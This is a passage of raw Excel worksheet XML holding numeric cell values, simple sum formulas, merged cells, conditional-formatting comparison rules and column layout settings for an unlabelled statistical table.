        <v>30</v>
      </c>
      <c r="N35" s="458">
        <v>31</v>
      </c>
      <c r="O35" s="572"/>
      <c r="P35" s="572"/>
      <c r="Q35" s="572"/>
      <c r="S35" s="214"/>
    </row>
    <row r="36" spans="1:19">
      <c r="A36" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B36" s="281"/>
      <c r="C36" s="281"/>
      <c r="D36" s="281"/>
      <c r="E36" s="281"/>
      <c r="F36" s="281"/>
      <c r="G36" s="281"/>
      <c r="H36" s="281"/>
      <c r="I36" s="281"/>
      <c r="J36" s="454"/>
      <c r="K36" s="653">
        <v>186823</v>
      </c>
      <c r="L36" s="458">
        <v>13005475</v>
      </c>
      <c r="M36" s="653">
        <v>0</v>
      </c>
      <c r="N36" s="458">
        <v>0</v>
      </c>
      <c r="O36" s="572"/>
      <c r="P36" s="572"/>
      <c r="Q36" s="572"/>
      <c r="S36" s="214"/>
    </row>
    <row r="37" spans="1:19" ht="13.5" thickBot="1">
      <c r="A37" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B37" s="283"/>
      <c r="C37" s="283"/>
      <c r="D37" s="283"/>
      <c r="E37" s="283"/>
      <c r="F37" s="283"/>
      <c r="G37" s="283"/>
      <c r="H37" s="283"/>
      <c r="I37" s="283"/>
      <c r="J37" s="457"/>
      <c r="K37" s="368">
        <v>2196.8953000000001</v>
      </c>
      <c r="L37" s="457">
        <v>37.3658</v>
      </c>
      <c r="M37" s="368">
        <v>0</v>
      </c>
      <c r="N37" s="457">
        <v>0</v>
      </c>
      <c r="O37" s="572"/>
      <c r="P37" s="572"/>
      <c r="Q37" s="572"/>
      <c r="S37" s="214"/>
    </row>
    <row r="38" spans="1:19" ht="26.25" customHeight="1" thickTop="1">
      <c r="A38" s="734" t="s">
        <v>4472</v>
      </c>
      <c r="B38" s="735"/>
      <c r="C38" s="735"/>
      <c r="D38" s="735"/>
      <c r="E38" s="735"/>
      <c r="F38" s="735"/>
      <c r="G38" s="735"/>
      <c r="H38" s="735"/>
      <c r="I38" s="735"/>
      <c r="J38" s="735"/>
      <c r="K38" s="735"/>
      <c r="L38" s="735"/>
      <c r="M38" s="735"/>
      <c r="N38" s="736"/>
      <c r="O38" s="572"/>
      <c r="P38" s="572"/>
      <c r="Q38" s="572"/>
      <c r="S38" s="214"/>
    </row>
    <row r="39" spans="1:19" ht="14.25" customHeight="1">
      <c r="A39" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B39" s="546"/>
      <c r="C39" s="546"/>
      <c r="D39" s="546"/>
      <c r="E39" s="546"/>
      <c r="F39" s="546"/>
      <c r="G39" s="546"/>
      <c r="H39" s="546"/>
      <c r="I39" s="546"/>
      <c r="J39" s="547"/>
      <c r="K39" s="548">
        <v>0.447214</v>
      </c>
      <c r="L39" s="549">
        <v>0.57207799999999998</v>
      </c>
      <c r="M39" s="548">
        <v>0.35675299999999999</v>
      </c>
      <c r="N39" s="549">
        <v>0.36927399999999999</v>
      </c>
      <c r="O39" s="214"/>
      <c r="S39" s="214"/>
    </row>
    <row r="40" spans="1:19" ht="36.75" customHeight="1">
      <c r="A40" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B40" s="260"/>
      <c r="C40" s="260"/>
      <c r="D40" s="260"/>
      <c r="E40" s="260"/>
      <c r="F40" s="260"/>
      <c r="G40" s="260"/>
      <c r="H40" s="260"/>
      <c r="I40" s="260"/>
      <c r="J40" s="312"/>
      <c r="K40" s="436" t="s">
        <v>4297</v>
      </c>
      <c r="L40" s="437" t="s">
        <v>4866</v>
      </c>
      <c r="M40" s="436" t="s">
        <v>4304</v>
      </c>
      <c r="N40" s="437" t="s">
        <v>4304</v>
      </c>
      <c r="O40" s="262"/>
      <c r="S40" s="214"/>
    </row>
    <row r="41" spans="1:19">
      <c r="A41" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B41" s="281"/>
      <c r="C41" s="281"/>
      <c r="D41" s="281"/>
      <c r="E41" s="281"/>
      <c r="F41" s="281"/>
      <c r="G41" s="281"/>
      <c r="H41" s="281"/>
      <c r="I41" s="281"/>
      <c r="J41" s="311"/>
      <c r="K41" s="653">
        <v>6</v>
      </c>
      <c r="L41" s="458">
        <v>106</v>
      </c>
      <c r="M41" s="653">
        <v>1</v>
      </c>
      <c r="N41" s="458">
        <v>1</v>
      </c>
      <c r="S41" s="214"/>
    </row>
    <row r="42" spans="1:19">
      <c r="A42" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B42" s="364"/>
      <c r="C42" s="364"/>
      <c r="D42" s="364"/>
      <c r="E42" s="364"/>
      <c r="F42" s="364"/>
      <c r="G42" s="364"/>
      <c r="H42" s="364"/>
      <c r="I42" s="364"/>
      <c r="J42" s="365"/>
      <c r="K42" s="658" t="s">
        <v>4780</v>
      </c>
      <c r="L42" s="659" t="s">
        <v>4867</v>
      </c>
      <c r="M42" s="658" t="s">
        <v>4862</v>
      </c>
      <c r="N42" s="659">
        <v>0.13636363636363635</v>
      </c>
      <c r="S42" s="214"/>
    </row>
    <row r="43" spans="1:19">
      <c r="A43" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B43" s="281"/>
      <c r="C43" s="281"/>
      <c r="D43" s="281"/>
      <c r="E43" s="281"/>
      <c r="F43" s="281"/>
      <c r="G43" s="281"/>
      <c r="H43" s="281"/>
      <c r="I43" s="281"/>
      <c r="J43" s="311"/>
      <c r="K43" s="653">
        <f>K44+K45</f>
        <v>43</v>
      </c>
      <c r="L43" s="458">
        <f t="shared" ref="L43" si="5">L44+L45</f>
        <v>68350</v>
      </c>
      <c r="M43" s="653">
        <f t="shared" ref="M43" si="6">M44+M45</f>
        <v>30</v>
      </c>
      <c r="N43" s="458">
        <f t="shared" ref="N43" si="7">N44+N45</f>
        <v>31</v>
      </c>
      <c r="O43" s="572"/>
      <c r="P43" s="572"/>
      <c r="Q43" s="572"/>
      <c r="S43" s="214"/>
    </row>
    <row r="44" spans="1:19">
      <c r="A44" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B44" s="281"/>
      <c r="C44" s="281"/>
      <c r="D44" s="281"/>
      <c r="E44" s="281"/>
      <c r="F44" s="281"/>
      <c r="G44" s="281"/>
      <c r="H44" s="281"/>
      <c r="I44" s="281"/>
      <c r="J44" s="311"/>
      <c r="K44" s="653">
        <v>43</v>
      </c>
      <c r="L44" s="458">
        <v>68350</v>
      </c>
      <c r="M44" s="653">
        <v>30</v>
      </c>
      <c r="N44" s="458">
        <v>31</v>
      </c>
      <c r="O44" s="572"/>
      <c r="P44" s="572"/>
      <c r="Q44" s="572"/>
      <c r="S44" s="214"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B45" s="281"/>
      <c r="C45" s="281"/>
      <c r="D45" s="281"/>
      <c r="E45" s="281"/>
      <c r="F45" s="281"/>
      <c r="G45" s="281"/>
      <c r="H45" s="281"/>
      <c r="I45" s="281"/>
      <c r="J45" s="311"/>
      <c r="K45" s="653">
        <v>0</v>
      </c>
      <c r="L45" s="458">
        <v>0</v>
      </c>
      <c r="M45" s="653">
        <v>0</v>
      </c>
      <c r="N45" s="458">
        <v>0</v>
      </c>
      <c r="O45" s="572"/>
      <c r="P45" s="572"/>
      <c r="Q45" s="572"/>
      <c r="S45" s="214"/>
    </row>
    <row r="46" spans="1:19" ht="13.5" thickBot="1">
      <c r="A46" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B46" s="367"/>
      <c r="C46" s="367"/>
      <c r="D46" s="367"/>
      <c r="E46" s="367"/>
      <c r="F46" s="367"/>
      <c r="G46" s="367"/>
      <c r="H46" s="283"/>
      <c r="I46" s="283"/>
      <c r="J46" s="283"/>
      <c r="K46" s="368">
        <v>0</v>
      </c>
      <c r="L46" s="457">
        <v>0</v>
      </c>
      <c r="M46" s="368">
        <v>0</v>
      </c>
      <c r="N46" s="457">
        <v>0</v>
      </c>
      <c r="O46" s="572"/>
      <c r="P46" s="572"/>
      <c r="Q46" s="572"/>
      <c r="S46" s="214"/>
    </row>
    <row r="47" spans="1:19" ht="14.25" customHeight="1" thickTop="1" thickBot="1">
      <c r="A47" s="730" t="s">
        <v>4582</v>
      </c>
      <c r="B47" s="731"/>
      <c r="C47" s="731"/>
      <c r="D47" s="731"/>
      <c r="E47" s="731"/>
      <c r="F47" s="731"/>
      <c r="G47" s="731"/>
      <c r="H47" s="731"/>
      <c r="I47" s="731"/>
      <c r="J47" s="731"/>
      <c r="K47" s="731"/>
      <c r="L47" s="731"/>
      <c r="M47" s="731"/>
      <c r="N47" s="732"/>
      <c r="O47" s="572"/>
      <c r="P47" s="572"/>
      <c r="Q47" s="572"/>
      <c r="S47" s="214"/>
    </row>
    <row r="48" spans="1:19" ht="18.75" customHeight="1" thickTop="1">
      <c r="A48" s="261" t="s">
        <v>640</v>
      </c>
      <c r="B48" s="567"/>
      <c r="C48" s="567"/>
      <c r="D48" s="567"/>
      <c r="E48" s="567"/>
      <c r="F48" s="567"/>
      <c r="G48" s="567"/>
      <c r="H48" s="567"/>
      <c r="I48" s="567"/>
      <c r="J48" s="568"/>
      <c r="K48" s="551">
        <v>0.447214</v>
      </c>
      <c r="L48" s="552">
        <v>0.88824000000000003</v>
      </c>
      <c r="M48" s="551">
        <v>0.35675299999999999</v>
      </c>
      <c r="N48" s="552">
        <v>0.36927399999999999</v>
      </c>
      <c r="O48" s="733" t="s">
        <v>2351</v>
      </c>
      <c r="P48" s="733"/>
      <c r="Q48" s="733"/>
      <c r="S48" s="214"/>
    </row>
    <row r="49" spans="1:19" ht="34.5" customHeight="1">
      <c r="A49" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B49" s="260"/>
      <c r="C49" s="260"/>
      <c r="D49" s="260"/>
      <c r="E49" s="260"/>
      <c r="F49" s="260"/>
      <c r="G49" s="260"/>
      <c r="H49" s="260"/>
      <c r="I49" s="260"/>
      <c r="J49" s="312"/>
      <c r="K49" s="436" t="s">
        <v>4297</v>
      </c>
      <c r="L49" s="437" t="s">
        <v>4864</v>
      </c>
      <c r="M49" s="436" t="s">
        <v>4304</v>
      </c>
      <c r="N49" s="437" t="s">
        <v>4304</v>
      </c>
      <c r="O49" s="262" t="s">
        <v>1766</v>
      </c>
      <c r="S49" s="214"/>
    </row>
    <row r="50" spans="1:19">
      <c r="A50" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B50" s="281"/>
      <c r="C50" s="281"/>
      <c r="D50" s="281"/>
      <c r="E50" s="281"/>
      <c r="F50" s="281"/>
      <c r="G50" s="281"/>
      <c r="H50" s="281"/>
      <c r="I50" s="281"/>
      <c r="J50" s="311"/>
      <c r="K50" s="653">
        <v>6</v>
      </c>
      <c r="L50" s="458">
        <v>92</v>
      </c>
      <c r="M50" s="653">
        <v>1</v>
      </c>
      <c r="N50" s="458">
        <v>1</v>
      </c>
      <c r="S50" s="214"/>
    </row>
    <row r="51" spans="1:19">
      <c r="A51" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B51" s="364"/>
      <c r="C51" s="364"/>
      <c r="D51" s="364"/>
      <c r="E51" s="364"/>
      <c r="F51" s="364"/>
      <c r="G51" s="364"/>
      <c r="H51" s="364"/>
      <c r="I51" s="364"/>
      <c r="J51" s="365"/>
      <c r="K51" s="658" t="s">
        <v>4780</v>
      </c>
      <c r="L51" s="659" t="s">
        <v>4865</v>
      </c>
      <c r="M51" s="658" t="s">
        <v>4862</v>
      </c>
      <c r="N51" s="659">
        <v>0.13636363636363635</v>
      </c>
      <c r="S51" s="214"/>
    </row>
    <row r="52" spans="1:19">
      <c r="A52" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B52" s="281"/>
      <c r="C52" s="281"/>
      <c r="D52" s="281"/>
      <c r="E52" s="281"/>
      <c r="F52" s="281"/>
      <c r="G52" s="281"/>
      <c r="H52" s="281"/>
      <c r="I52" s="281"/>
      <c r="J52" s="311"/>
      <c r="K52" s="653">
        <f>K53+K54</f>
        <v>43</v>
      </c>
      <c r="L52" s="458">
        <f t="shared" ref="L52:N52" si="8">L53+L54</f>
        <v>2298468</v>
      </c>
      <c r="M52" s="653">
        <f t="shared" si="8"/>
        <v>30</v>
      </c>
      <c r="N52" s="458">
        <f t="shared" si="8"/>
        <v>31</v>
      </c>
      <c r="O52" s="572"/>
      <c r="P52" s="572"/>
      <c r="Q52" s="572"/>
      <c r="S52" s="214"/>
    </row>
    <row r="53" spans="1:19">
      <c r="A53" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B53" s="281"/>
      <c r="C53" s="281"/>
      <c r="D53" s="281"/>
      <c r="E53" s="281"/>
      <c r="F53" s="281"/>
      <c r="G53" s="281"/>
      <c r="H53" s="281"/>
      <c r="I53" s="281"/>
      <c r="J53" s="311"/>
      <c r="K53" s="653">
        <v>43</v>
      </c>
      <c r="L53" s="458">
        <v>341549</v>
      </c>
      <c r="M53" s="653">
        <v>30</v>
      </c>
      <c r="N53" s="458">
        <v>31</v>
      </c>
      <c r="O53" s="572"/>
      <c r="P53" s="572"/>
      <c r="Q53" s="572"/>
      <c r="S53" s="214"/>
    </row>
    <row r="54" spans="1:19">
      <c r="A54" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B54" s="281"/>
      <c r="C54" s="281"/>
      <c r="D54" s="281"/>
      <c r="E54" s="281"/>
      <c r="F54" s="281"/>
      <c r="G54" s="281"/>
      <c r="H54" s="281"/>
      <c r="I54" s="281"/>
      <c r="J54" s="311"/>
      <c r="K54" s="653">
        <v>0</v>
      </c>
      <c r="L54" s="458">
        <v>1956919</v>
      </c>
      <c r="M54" s="653">
        <v>0</v>
      </c>
      <c r="N54" s="458">
        <v>0</v>
      </c>
      <c r="O54" s="572"/>
      <c r="P54" s="572"/>
      <c r="Q54" s="572"/>
      <c r="S54" s="214"/>
    </row>
    <row r="55" spans="1:19" ht="13.5" thickBot="1">
      <c r="A55" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B55" s="283"/>
      <c r="C55" s="283"/>
      <c r="D55" s="283"/>
      <c r="E55" s="283"/>
      <c r="F55" s="283"/>
      <c r="G55" s="283"/>
      <c r="H55" s="283"/>
      <c r="I55" s="283"/>
      <c r="J55" s="283"/>
      <c r="K55" s="368">
        <v>0</v>
      </c>
      <c r="L55" s="457">
        <v>5.7972000000000001</v>
      </c>
      <c r="M55" s="368">
        <v>0</v>
      </c>
      <c r="N55" s="457">
        <v>0</v>
      </c>
      <c r="O55" s="572"/>
      <c r="P55" s="572"/>
      <c r="Q55" s="572"/>
      <c r="S55" s="214"/>
    </row>
    <row r="56" spans="1:19" ht="13.5" thickTop="1"/>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="B2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="O48:Q48"/>
    <mergeCell ref="A11:N11"/>
    <mergeCell ref="A20:N20"/>
    <mergeCell ref="A29:N29"/>
    <mergeCell ref="A38:N38"/>
    <mergeCell ref="A47:N47"/>
  </mergeCells>
  <conditionalFormatting sqref="B15:J16 M15:N16 B17:N18">
    <cfRule type="expression" dxfId="100" priority="336">
      <formula>IF(B15&gt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B33:J34 B35:N36">
    <cfRule type="expression" dxfId="99" priority="14">
      <formula>IF(B33&gt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B42:J43 B44:N45">
    <cfRule type="expression" dxfId="98" priority="11">
      <formula>IF(B42&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B43:J43">
    <cfRule type="expression" dxfId="97" priority="162">
      <formula>IF(OR(B43&lt;B44,B43&lt;B45),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B51:J52 B53:N54">
    <cfRule type="expression" dxfId="96" priority="9">
      <formula>IF(B51&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B52:J52">
    <cfRule type="expression" dxfId="95" priority="107">
      <formula>IF(OR(B52&lt;B53,B52&lt;B54),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B24:K24 M24:N24 B25:N27">
    <cfRule type="expression" dxfId="94" priority="226">
      <formula>IF(B24&lt;B15,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B7:N7">
    <cfRule type="expression" dxfId="93" priority="432">
      <formula>IF(OR(B7&lt;B8,B7&lt;B9),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B12:N12">
    <cfRule type="expression" dxfId="92" priority="93">
      <formula>IF(B12&gt;B5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:N19">
    <cfRule type="expression" dxfId="91" priority="96">
      <formula>IF(B19&gt;B10,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B21:N21">
    <cfRule type="expression" dxfId="90" priority="94">
      <formula>IF(B21&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:N23">
    <cfRule type="expression" dxfId="89" priority="292">
      <formula>IF(B23&gt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B28:N28">
    <cfRule type="expression" dxfId="88" priority="95">
      <formula>IF(B28&lt;B19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B39:N39">
    <cfRule type="expression" dxfId="87" priority="8">
      <formula>IF(B39&gt;B30,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B41:N41">
    <cfRule type="expression" dxfId="86" priority="12">
      <formula>IF(B41&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B46:N46">
    <cfRule type="expression" dxfId="85" priority="7">
      <formula>IF(B46&gt;B37,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B48:N48">
    <cfRule type="expression" dxfId="84" priority="98">
      <formula>IF(B48&lt;B39,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B50:N50">
    <cfRule type="expression" dxfId="83" priority="10">
      <formula>IF(B50&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B55:N55">
    <cfRule type="expression" dxfId="82" priority="97">
      <formula>IF(B55&lt;B46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D6:D9">
    <cfRule type="expression" dxfId="81" priority="475">
      <formula>IF(OR(D6&lt;B6,D6&lt;C6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D14:D18">
    <cfRule type="expression" dxfId="80" priority="402">
      <formula>IF(OR(D14&lt;B14,D14&lt;C14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23:D27">
    <cfRule type="expression" dxfId="79" priority="247">
      <formula>IF(OR(D23&lt;B23,D23&lt;C23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32:D36">
    <cfRule type="expression" dxfId="78" priority="35">
      <formula>IF(OR(D32&lt;B32,D32&lt;C32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D41:D45">
    <cfRule type="expression" dxfId="77" priority="161">
      <formula>IF(OR(D41&lt;B41,D41&lt;C41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D50:D54">
    <cfRule type="expression" dxfId="76" priority="106">
      <formula>IF(OR(D50&lt;B50,D50&lt;C50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E6:G9">
    <cfRule type="expression" dxfId="75" priority="462">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E14:G18">
    <cfRule type="expression" dxfId="74" priority="379">
      <formula>IF(E14&lt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23:G27">
    <cfRule type="expression" dxfId="73" priority="244">
      <formula>IF(E23&lt;B23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32:G36">
    <cfRule type="expression" dxfId="72" priority="32">
      <formula>IF(E32&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E41:G45">
    <cfRule type="expression" dxfId="71" priority="159">
      <formula>IF(E41&lt;B41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E50:G54">
    <cfRule type="expression" dxfId="70" priority="104">
      <formula>IF(E50&lt;B50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G6:G9">
    <cfRule type="expression" dxfId="69" priority="461">
      <formula>IF(OR(G6&lt;E6,G6&lt;F6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G14:G18">
    <cfRule type="expression" dxfId="68" priority="378">
      <formula>IF(OR(G14&lt;E14,G14&lt;F14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G23:G27">
    <cfRule type="expression" dxfId="67" priority="243">
      <formula>IF(OR(G23&lt;E23,G23&lt;F23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G32:G36">
    <cfRule type="expression" dxfId="66" priority="31">
      <formula>IF(OR(G32&lt;E32,G32&lt;F32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G41:G45">
    <cfRule type="expression" dxfId="65" priority="158">
      <formula>IF(OR(G41&lt;E41,G41&lt;F41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G50:G54">
    <cfRule type="expression" dxfId="64" priority="103">
      <formula>IF(OR(G50&lt;E50,G50&lt;F50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6:I9">
    <cfRule type="expression" dxfId="63" priority="457">
      <formula>IF(I6&lt;H6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:I18">
    <cfRule type="expression" dxfId="62" priority="367">
      <formula>IF(I14&lt;H14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:I27">
    <cfRule type="expression" dxfId="61" priority="242">
      <formula>IF(I23&lt;H23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I32:I36">
    <cfRule type="expression" dxfId="60" priority="30">
      <formula>IF(I32&lt;H32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I41:I45">
    <cfRule type="expression" dxfId="59" priority="157">
      <formula>IF(I41&lt;H41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I50:I54">
    <cfRule type="expression" dxfId="58" priority="102">
      <formula>IF(I50&lt;H50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J6:J9">
    <cfRule type="expression" dxfId="57" priority="453">
      <formula>IF(OR(J6&lt;H6,J6&lt;I6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J14:J18">
    <cfRule type="expression" dxfId="56" priority="360">
      <formula>IF(OR(J14&lt;H14,J14&lt;I14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J23:J27">
    <cfRule type="expression" dxfId="55" priority="241">
      <formula>IF(OR(J23&lt;H23,J23&lt;I23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J32:J36">
    <cfRule type="expression" dxfId="54" priority="29">
      <formula>IF(OR(J32&lt;H32,J32&lt;I32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J41:J45">
    <cfRule type="expression" dxfId="53" priority="156">
      <formula>IF(OR(J41&lt;H41,J41&lt;I41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J50:J54">
    <cfRule type="expression" dxfId="52" priority="101">
      <formula>IF(OR(J50&lt;H50,J50&lt;I50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K34:N34">
    <cfRule type="expression" dxfId="51" priority="3">
      <formula>IF(K34&lt;K25,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6:L9">
    <cfRule type="expression" dxfId="50" priority="449">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L14 L17:L18">
    <cfRule type="expression" dxfId="49" priority="345">
      <formula>IF(L14&lt;K14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L23 L25:L27">
    <cfRule type="expression" dxfId="48" priority="240">
      <formula>IF(L23&lt;K23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L32:L36 N33:N36">
    <cfRule type="expression" dxfId="47" priority="4">
      <formula>IF(L32&lt;K32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L41 L44:L45">
    <cfRule type="expression" dxfId="46" priority="155">
      <formula>IF(L41&lt;K41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L50 L53:L54">
    <cfRule type="expression" dxfId="45" priority="100">
      <formula>IF(L50&lt;K50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6:N9">
    <cfRule type="expression" dxfId="44" priority="445">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N14:N18">
    <cfRule type="expression" dxfId="43" priority="337">
      <formula>IF(N14&lt;M14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N23:N27">
    <cfRule type="expression" dxfId="42" priority="227">
      <formula>IF(N23&lt;M23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N41 N44:N45">
    <cfRule type="expression" dxfId="41" priority="154">
      <formula>IF(N41&lt;M41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N50 N53:N54">
    <cfRule type="expression" dxfId="40" priority="99">
      <formula>IF(N50&lt;M50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="58"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6"/>
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="12.7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7">
    <outlinePr summaryBelow="0" summaryRight="0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:BU213"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="2" ySplit="2" topLeftCell="C3" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="G1" sqref="G1"/>
      <selection pane="bottomLeft" activeCell="A3" sqref="A3"/>
      <selection pane="bottomRight" activeCell="BN3" sqref="BN3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4" style="79" customWidth="1"/>
    <col min="2" max="2" width="9.140625" style="4" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="55.5703125" style="6" customWidth="1"/>
    <col min="4" max="4" width="9.85546875" style="4" customWidth="1"/>
    <col min="5" max="5" width="10.140625" style="4" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="7.5703125" style="4" customWidth="1"/>
    <col min="7" max="7" width="9" style="4" customWidth="1"/>
    <col min="8" max="8" width="6.5703125" style="4" customWidth="1"/>
    <col min="9" max="9" width="8.28515625" style="4" customWidth="1"/>
    <col min="10" max="10" width="8.5703125" style="4" customWidth="1"/>
    <col min="11" max="11" width="7.5703125" style="4" customWidth="1"/>
    <col min="12" max="12" width="9.42578125" style="4" customWidth="1"/>
    <col min="13" max="13" width="6.5703125" style="4" customWidth="1"/>
    <col min="14" max="14" width="8.140625" style="4" customWidth="1"/>
    <col min="15" max="15" width="8.5703125" style="4" customWidth="1"/>
    <col min="16" max="16" width="7.5703125" style="4" customWidth="1"/>
    <col min="17" max="17" width="9.140625" style="4" customWidth="1"/>
    <col min="18" max="18" width="6.5703125" style="4" customWidth="1"/>
    <col min="19" max="19" width="8.140625" style="4" customWidth="1"/>
    <col min="20" max="20" width="8.5703125" style="4" customWidth="1"/>
    <col min="21" max="21" width="8.7109375" style="4" customWidth="1"/>
    <col min="22" max="22" width="10.28515625" style="4" customWidth="1"/>
    <col min="23" max="23" width="6.5703125" style="4" customWidth="1"/>
    <col min="24" max="24" width="8.42578125" style="4" customWidth="1"/>
    <col min="25" max="25" width="8.5703125" style="4" customWidth="1"/>
    <col min="26" max="26" width="7.5703125" style="1" customWidth="1"/>
    <col min="27" max="27" width="9.28515625" style="1" customWidth="1"/>
    <col min="28" max="28" width="6.5703125" style="1" customWidth="1"/>
    <col min="29" max="29" width="9.140625" style="1" customWidth="1"/>
    <col min="30" max="30" width="8.5703125" style="1" customWidth="1"/>
